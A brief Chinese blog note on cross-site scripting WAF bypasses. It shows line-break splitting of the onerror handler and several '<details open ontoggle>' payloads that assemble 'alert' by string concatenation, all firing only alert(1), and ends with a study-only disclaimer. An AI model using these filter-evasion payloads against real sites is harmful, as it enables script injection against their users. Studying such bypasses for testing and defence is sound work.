xss bypass小记

有时候waf会针对payload过滤onerror、alert等之类的关键字事件属性,或者把关键字事件替换成其他字符,单独的事件属性不会防护,这时候可以用换行来解决

1
2
3
<img src=1 
onerror 
=alert(1)


如果只单独针对alert做防护的话就可以用拼接的方式来绕过:

1
2
3
4
5
6
<details open ontoggle=top['al'%2B'ert'](1) >
<details open ontoggle=self['al'%2B'ert'](1) >
<details open ontoggle=parent['al'%2B'ert'](1) >
<details open ontoggle=frames['al'%2B'ert'](1) >
<details open ontoggle=content['al'%2B'ert'](1) >
<details open ontoggle=window['al'%2B'ert'](1) >
漏洞挖掘
XSS绕过 OWASPTOP10漏洞

声明:
本文章用于学习交流,严禁用于非法操作,出现后果一切自行承担,阅读此文章表示你已同意本声明。

Disclaimer:
This article is for study and communication. It is strictly forbidden to use it for illegal operations. All consequences shall be borne by yourself. Reading this article means that you have agreed to this statement.